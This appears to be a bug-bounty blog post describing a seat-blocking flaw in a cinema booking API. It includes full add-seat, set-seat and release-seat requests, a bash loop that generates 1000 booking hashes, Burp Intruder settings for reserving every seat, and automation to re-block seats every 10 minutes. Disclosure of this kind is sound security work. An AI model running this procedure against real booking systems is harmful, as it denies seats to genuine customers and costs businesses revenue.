How a Vulnerability in Cinema Booking Systems Can Block Seats and Impact Revenue

In the digital age, online booking systems have become a cornerstone of convenience for consumers and businesses alike. However, these systems are not immune to vulnerabilities that can be exploited to disrupt services, cause financial losses, and damage a company’s reputation.

Recently, I identified a critical flaw in a cinema booking system that highlights the importance of securing such platforms. Here’s a detailed analysis of the issue, its potential impact, and why it needs immediate attention.

[NOTE: although it was not regarded as a vulnerability due to it being considered as application DOS, i am sharing this so that u can understand my though process due this find]

The Vulnerability: Exploiting tempTransID and transID

The vulnerability revolves around how the booking system handles temporary transaction IDs (tempTransID) and booking IDs (bookingIDs). By leveraging a single tempTransID, an attacker can generate multiple unique bookingIDs in a brute-force manner. These bookingIDs can then be used to reserve all the available seats in a theatre.

The booking system allows reservations to expire after a 10-minute interval. However, this restriction can be bypassed by automating the reservation process to repeat every 10 minutes, effectively blocking legitimate users from accessing the seats. This creates a denial-of-service scenario where no real customers can complete bookings.

Additionally, the system’s reliance on transID for managing reservations introduces another layer of vulnerability. By obtaining or guessing the transID associated with a booking, an attacker can unbook specific seats at will. This provides unauthorized control over seat availability and further exacerbates the issue.

[At first the triager told that it was intended behavior and that a user can book many seats..but upon testing i found that a user can max book upto 10 seats. But i was able to more than just 10 seats, so for impact i booked the whole theatre.]

Step1) while booking a single seat, view the request flow in burpsuite and send the below request to repeater:

POST /v2/movies/add-seat?version=3&site_id=6&channel=web&child_site_id=370&client_id=<redacted>&clientId=<redacted> HTTP/2
Host: <redacted>.paytm.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://<redacted>.com/
Content-Type: application/json; charset=utf-8
Content-Length: 285
Origin: https://<redacted>.com
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
Priority: u=4
Te: trailers

{"cancelOld":false,"cinemaId":1025103,"sessionId":"86814","providerId":1707,"tempTransId":"3feb8964ea8f12955068e2719238c410c34c8865901e554ea6091f9efa685f47","ticketType":"86814_CL","ticketcount":1,"freeSeating":false,"showDateTime":"2025-01-24T07:30:00.000Z","totalTicketPrice":190.59}

the response would be:

{"bookingId":"5359e6bc3717cc75b13d41bc5bf5c7b76bbea04028ca3999c39054598dba2ec3","seatInfo":"CL-1","totalAmount":null,"tempTransId":"5359e6bc3717cc75b13d41bc5bf5c7b76bbea04028ca3999c39054598dba2ec3","bookingIndex":"5359e6bc3717cc75b13d41bc5bf5c7b76bbea04028ca3999c39054598dba2ec3","uniqueBookingId":"5359e6bc3717cc75b13d41bc5bf5c7b76bbea04028ca3999c39054598dba2ec3","seatCodes":["CL-1"],"merchantIds":{"food":226708,"ticket":226708},"bookingHashKey":"a25d92ffc4","items":{},"rules":[]}

the hashes that u are seeing as uniqueBookingId could be used to book a seat..and an attacker could create a bash script to create 1–1000s of such hashes.

Step2)create a bash script to create 1000 hashes

#!/bin/bash

url="https://<redacted>.paytm.com/v2/movies/add-seat?version=3&site_id=6&channel=web&child_site_id=370&client_id=<redacted>&clientId=<redacted>"

data='{
"cancelOld": false,
"cinemaId": 1025103,
"sessionId": "86814",
"providerId": 1707,
"tempTransId": "3feb8964ea8f12955068e2719238c410c34c8865901e554ea6091f9efa685f47",
"ticketType": "86814_CL",
"ticketcount": 1,
"freeSeating": false,
"showDateTime": "2025-01-24T07:30:00.000Z",
"totalTicketPrice": 190.59
}'

output_file="tempTransIds.txt"

for i in {1..1000}
do
echo "Sending request $i..."

# Send POST request and capture the response (including headers and body)
response=$(curl -s -X POST "$url" \
-H "Host: <redacted>.paytm.com" \
-H "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0" \
-H "Content-Type: application/json; charset=utf-8" \
--data-binary "$data")

echo "Full response for request $i:"
echo "$response"
echo "--------------------------------------------------"

# Extract tempTransId from the response body
tempTransId=$(echo "$response" | grep -o '"tempTransId":"[^"]*' | sed 's/"tempTransId":"//')

if [ ! -z "$tempTransId" ]; then
echo "Extracted tempTransId: $tempTransId"
echo "$tempTransId" >> "$output_file"
else
echo "No tempTransId found in the response for request $i."
fi
done

echo "Done! 1000 tempTransIds have been saved to '$output_file'."

step3) during the booking flow there was another request,which i had then sent to intruder. this was the request:

POST /v1/movies/set-seat?version=3&site_id=6&channel=web&child_site_id=370&client_id=<redacted>&clientId=<redacted> HTTP/2
Host: <redacted>.paytm.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://<redacted>.com/
Content-Type: application/json; charset=utf-8
Content-Length: 296
Origin: https://<redacted>.com
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
Priority: u=4
Te: trailers

{"areaNumber":[1],"gridSeatRowId":["3"],"gridSeatNumber":["14"],"areaCategoryCode":["CL"],"cinemaId":1025103,"sessionId":"86814","providerId":1707,"tempTransId":"cad737b505f2d4c1995a1ecd522203377633f748bfa95ab1001eab0e13d12c07","showDateTime":"2025-01-24T07:30:00.000Z","totalTicketPrice":190.59}

So..in the intruder i used PITCHFORK attack and set “gridSeatNumber” as a number list from 1–15 and “tempTransId” as the simple list using tempTransId.txt list that was created by bash. Next, we run the intruder

[NOTE:here the “gridSeatRowId” can be recursively changed so that all the seats in the theatre can be booked]

step4) if u want to free any seat in the theatre, the attacker can just send the below request:

POST /v1/movies/release-seats?version=3&site_id=6&channel=web&child_site_id=370&client_id=<redacted>&clientId=<redacted> HTTP/2
Host: <redacted>.paytm.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://<redacted>.com/
Content-Type: application/json; charset=utf-8
Content-Length: 135
Origin: https://<redacted>.com
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
Priority: u=4
Te: trailers

{"cinemaId":1025103,"sessionId":"86814","providerId":1707,"transId":"cad737b505f2d4c1995a1ecd522203377633f748bfa95ab1001eab0e13d12c07"}

here he can just change the”transId” to the hashId that will be present in the output of (step3).

To constantly keep the seats booked he can perform the above steps every 10 minutes using automation!!

— — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — —

The intended behavior is that a user can book many seats..but upon testing i found that a user can max book upto 10 seats. But i was able to more than just 10 seats, so for impact i booked the whole theatre, that was the reason the vulnerability existed!!!

before booking the seats in D and E seactionafter booking section D and E

(u can see there are 15 seats booked..this was done to show impact without disrupting other users during their booking process)

The implications of this vulnerability are significant and far-reaching:

Denial of Service: By monopolizing all available seats, the attacker prevents legitimate users from making bookings, resulting in poor customer experience and frustration.Financial Loss: With no tickets being sold to genuine customers, the theatre incurs direct revenue loss, especially during peak times or for popular shows.Reputational Damage: Frequent unavailability of seats or complaints about the booking system’s reliability tarnishes the company’s image, leading to loss of customer trust.Operational Disruption: Staff may need to manually intervene to address customer grievances or resolve booking conflicts, increasing workload and inefficiencies.

Conclusion

This case study underscores the importance of securing online booking systems against exploitation. The potential for financial loss, operational disruption, and reputational damage makes it imperative for companies to prioritize system security.

If you’re interested in learning more about security vulnerabilities and how to protect against them, follow my blog for regular updates and insights.